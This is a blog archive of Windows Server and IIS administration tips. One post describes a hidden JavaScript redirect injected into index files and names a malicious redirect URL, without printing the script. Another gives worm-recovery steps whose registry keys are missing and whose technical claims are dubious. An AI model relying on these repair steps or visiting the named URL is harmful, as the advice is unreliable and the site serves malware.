IIS Hacks | Server Resources

Where’s POP3?

A few people have asked where to find the POP3 service in Windows 2008 for a simple mail server. The answer: nowhere.

While SMTP is alive and well in the Features section of the Windows 2008 Server Manager, POP3 has been removed from Windows 2008 altogether.

POP3 isn’t a very “good” method to retrieving mail and I know very few organizations that still utilize it. IMAP and Exchange connectors are far more feature-rich and useful especially in today’s multiple-device world. I do run a POP3 mail server for World’s Cutest Animals because it is quick, has minimal resource usage and is perfect for a mail server that only has a few mailboxes.

Before we all scream foul and ask Microsoft to add POP3 back into Windows 2008 SPx, I suggest you check out Hannes Preishuber’s POP3 connector for Windows 2008 x86 and x64.

http://weblogs.asp.net/hpreishuber/archive/2008/04/30/visendo-smtp-pop3-extender-for-windows-2008-server.aspx

Posted By Chris in Internet Information Server, Windows
No Comments |  Print This Post

With the release of Windows Server 2008 and IIS 7, Microsoft has included PHP5 FASTCGI support. ISAPI is still faster in my opinion, and if used correctly, very stable. PHP uses a 32-bit DLL so it will not work with an x64 system. There are several ports of PHP to x64, but all have proved to be unstable. Below I will outline the steps to install PHP 32-bit on Windows 2008 x64 (and have it stable).

1. Install the PHP4 or PHP5 package (32-bit) in C:\PHP or wherever you like. Only use the Windows installer from php.net if you do not need any extensions. I would recommend downloading the PHP zip package. 
2. Open the Internet Information Services (IIS) Manager. 
3. Double-click “Handler Mappings” from the main IIS screen.
4. Click on “Add Script Map.”
5. Set up the handler mapping for c:\PHP\php5isapi.dll with extension *.php and check to allow the ISAPI extension and execution of scripts.
6. Double-click “ISAPI & CGI Restrictions” on the main IIS screen. Right-click on PHP and select “Edit Feature Settings” and check “Allow unspecified ISAPI modules.”  
7. Right-click on the Default Application Pool (or the one you want to use if more than one) and select “Advanced Settings.” 
8. Change the “Enable 32-bit Applications” to True. Click OK. This spawns the App Pool in 32-bit mode, so if you have other modules that need to be run in 64-bit mode, best to separate the website into two App Pools: one 32-bit and one 64-bit.
9. Restart the server.

Posted By Chris in General, Internet Information Server, PHP, Windows
1 Comment |  Print This Post

Below is the javascript code of an “injection” that inserts itself into the index file of a website. It is designed to go undetected by only redirecting seldomly and randomly. It is placed at the bottom of the source code, with a significant gap in whitespace after the end of the regular source code (115 lines in all cases). In most of the cases that I have come across, it redirects to a “spyware” or “virus” site. It also goes undetected by antivirus programs (Trend Micro, Panda, Avast). It works with Mozilla (2.0.0.11) and IE7 (haven’t tested it in others). I’ll look into it further once I decode the script itself.

One of the sites it redirects to is: http://e.pepato.org/e/adsr.php?t=0 

It infects each individual .php file and does not re-infect after the initial infection. I have created new sites and cleaned infected .php files and it has disappeared completely. It injects this code into .php (and .html) files about 115 lines below the end line. It ONLY infects index.php/html files in the root directory of the website. If you name your file: index2.php - it will not be infected. The “modified date” time stamps DO change with the infection. There was a spread of 1 minute for hundreds of .php files. If you need a quick way to search all index.php/html files on a server, download notepad++ and use the “search in directory” feature for certain strings of text. Alternatively, once you find the time stamp of infection, search for files modified at that time.

Looks like a newer one, I’ve heard reports of similar activity as far back as mid January.

Posted By Chris in Internet Information Server, Windows
6 Comments |  Print This Post

As most of you know, Windows is a hotbed of viruses (not virii), worms, and malware. I’ve had the pleasure of finding a new worm that attacks the TCP/IP service: tcpsrv.exe in the C:\Windows\System32\ folder. This file is needed for Active Directory and the Workstation Driver (ie. Client for Microsoft Networks). With this file removed, you cannot remote into your server, run active directory and as a result Exchange Server. You can, however, serve web pages just fine with IIS.

I have three Antivirus “managers” on my internal and external network. Panda Enterprise, Trend Micro ServerProtect and Avast Antivirus for Server 2003. My favorite is Avast because it is easy to use and “cheap.” The TCP/IP worm was not detected by Panda or Trend Micro. Avast only knew it was malicious and recommended to quarantine or delete it upon restart. If you delete it upon restart or even quarantine, your server will no doubt be crippled. You will not be able to log into your server through RDP (Remote Desktop).

When you try to login through RDP (Remote Desktop) you type your username and password and an error pops up: “Cannot log on. The Workstation driver is not installed.” “Workstation Driver” is the common name for Client for Microsoft Networks found in your network adapter properties. So how do you fix your server if you cannot log into it? Well, it takes some telnet and some creative FTP in the Windows directory, which I will explain in a different post. For now, you’ll need physical access to your server or someone with physical access that can follow instructions.

You can login to your server at the physical workstation no problem because only the RDP login utilizes the TCP/IP Service, unlike the regular workstation login. Because the TCP/IP service is missing or corrupted, the following services (all found in services.msc at the run command) will not work:

1. Workstation (or client for Microsoft networks)
2. Server
3. TCP/IP Service
4. RPC Locator
5. Netlogon

The RPC Locator and Net Logon depend on the Workstation service. All of these services should be set to Startup Type: Automatic and should be started on any machine. The Server service is what controls the domain controller or lets your computer know WHAT it is. If you try to access Active Directory an error saying “the domain could not be found” or “the computer is not part of a domain.” This is important for active directory and Exchange Server. Server requires TCP/IP service to run. Steps:

1. Locate a fresh copy of tcpsrv.exe in a backup or i386 folder of the install disc. For Windows 2003 SP2 the latest revision is 2006. Put it into the System32 directory and manually restart all the above services. If this works, fantastic, it was easy contained worm. If not, read on.

2. If the above did not work you’ll need to go into the network adapter properties and delete “Client for Microsoft Networks.” You will need to restart after you have done this. Once restarted, re-install Client for Microsoft Networks. You will need your Windows 2003 CD. Restart again.

3. Verify that the startup type for the RPC Locator service is set to Automatic and start the service. Do the same for the Net Logon service but do not start it yet. Start Registry Editor (Regedt32.exe) and then click the DependOnService value under the key in the registry: 

4. On the Edit menu, click Multi String, type LanmanServer on a line by itself, and then click OK. In the Services tool, start the Netlogon service. If you cannot start it, continue with the steps below. If it does start, then start the Server service and verify Active Directory Users and Computers opens and you can see the available users/computers.

5. If the above still didn’t work, you may also have a corrupt TCP/IP stack and corrupt Winsock2. You’ll need to restart your computer in “Directory Services Restore Mode” by pressing F8 after the BIOS information has displayed. Once you have logged in, open regedit32.exe and find and delete the following registry keys:

6. Locate the Nettcpip.inf file in your Windows\inf directory and open it in notepad. Find [MS_TCPIP.PrimaryInstall] and edit Characteristics = 0xa0 to 0×80.

7. Go into the properties of your network adapter and click “Install,” select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK. 

8. This allows you to remove the TCP/IP service from a domain controller (which was not possible before). Now in the properties box of the network adapter select “Internet Protocol (TCP/IP)” and click Uninstall. Once it has uninstalled. Restart the computer in Directory Services Mode again. Reinstall the Internet Protocol (TCP/IP) by going into the properties of your network adapter and clicking “Install,” select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK. 

9. Restart your computer in normal mode. All services should have started. If not, verify the above services are set to automatic and try to start them manually.

Posted By Chris in Exchange Server, Internet Information Server, Windows
2 Comments |  Print This Post

With some of the servers I maintain, prisoner.iana.org shows up as a DNS entry in the system logs. Because of the name, it “looks” suspicious. It is nothing to worry about: there are no hackers, and something isn’t wrong with your system.

IANA was the name of the organization that was responsible for handing out IP address blocks back in the day.

There was a need for a placeholder zone for the three blocks of non-routable addresses, so IANA setup three DNS servers: blackhole-1.iana.org, blackhole-2.iana.org and prisoner.iana.org.

If a system with the address range: 192.168.XXX.XXX tries to register its PTR record without a local DNS server, it will try to register with prisoner.iana.org. Obviously prisoner.iana.org will reject the request. Hence the many instances of this address in the DNS logs / Event Viewer.

Posted By Chris in General, Internet Information Server, Windows
No Comments |  Print This Post

Below are the log file formats supported in IIS 6. It is important to choose the right one for your server so that you can make use of the data it collects. I personally use W3C Extended because it provides the most information. The downside is that it produces more disk activity, however if you have a fast file system you may not notice a performance hit. I also like the ODBC logging because I can create a web-based front-end to display and manipulate the data/statistics. I’ve outlined the major components of each log format and the information it collects.

Microsoft IIS Log File Format

-Fixed ASCII text-based format.
-Cannot be customized.
-Records: client IP, username, date, time, service, server name, server IP, time taken, client bytes sent, server bytes sent, service status code, Windows status code, request type, target of operation and script parameters.

NCSA Common Log File Format

-Fixed ASCII text-based format.
-Cannot be customized.
-Records: remote host address, remote log name (blank), username, date, time, GMT offset, request and protocol versions, service status code and bytes sent.

W3C Extended Log File Format

-ASCII text-based format.
-Customizable.
-Records: Date, Time, Client IP Address, User Name, Service Name and Instance Number, Server Name, Server IP Address, Server Port, Method, URI Stem, URI Query, HTTP Status, Win32 Status, Bytes Sent, Bytes Received, Time Taken, Protocol Version, Host, User Agent, Cookie, Referrer and Protocol Substatus.

ODBC Logging Format

-Records to any ODBC-compliant database (SQL Server, Oracle, Access).
-Records: Client Host, User Name, Log Time, Service, Machine, Server IP, Processing Time, Bytes Received, Bytes Sent, Service Status, Win32 Status, Operation, Target, Parameters.
-In order to use this method of logging the administrator needs to configure a database table with the appropriate fields, and then configure a logon/password for use with the ODBC connector. This is viewed as a security risk. Do not use the SQL server username “SA” for logging (even more of a security risk). This method of logging can also slow down the server due to Http.sys cache being disabled.

Posted By Chris in Internet Information Server, Windows
No Comments |  Print This Post

Do you have IIS logging enabled? Do you ever use it? If you don’t use it, consider turning it off. By looking at the log files, you can see an awful lot of text is recorded with every visitor. Items such as bytes sent, referrers, and domain/host info slows down the server considerably. Reverse DNS requests when logging host info for a visitor will really slow the server. For small sites hosted on powerful servers performance may not be an issue. If you have a site with many visitors and/or databases (forums), logging can cause significant hard disk activity and paging.

To disable logging, go into the IIS Manager -> Right-click on Websites and select Properties-> Uncheck “Enable Logging”

You can also do this for FTP sites as well. To disable it for a specific site, right-click on the site-name and disable logging.

Posted By Chris in Internet Information Server, Windows
No Comments |  Print This Post

This is a quick tip to those who are having trouble installing or using Wordpress on Windows Server with PHP.

Make sure in the PHP.ini file that the following is set:

If this is ON, Wordpress will not allow you to login. It will spit out the following error:

“You do not have sufficient permissions to access this page.”

You CAN have magic_quotes ON though, which is a different setting. The above setting is for data being pulled from a MySQL database for example.

Also make sure the following is set:

Posted By Chris in Internet Information Server, MySQL, PHP
2 Comments |  Print This Post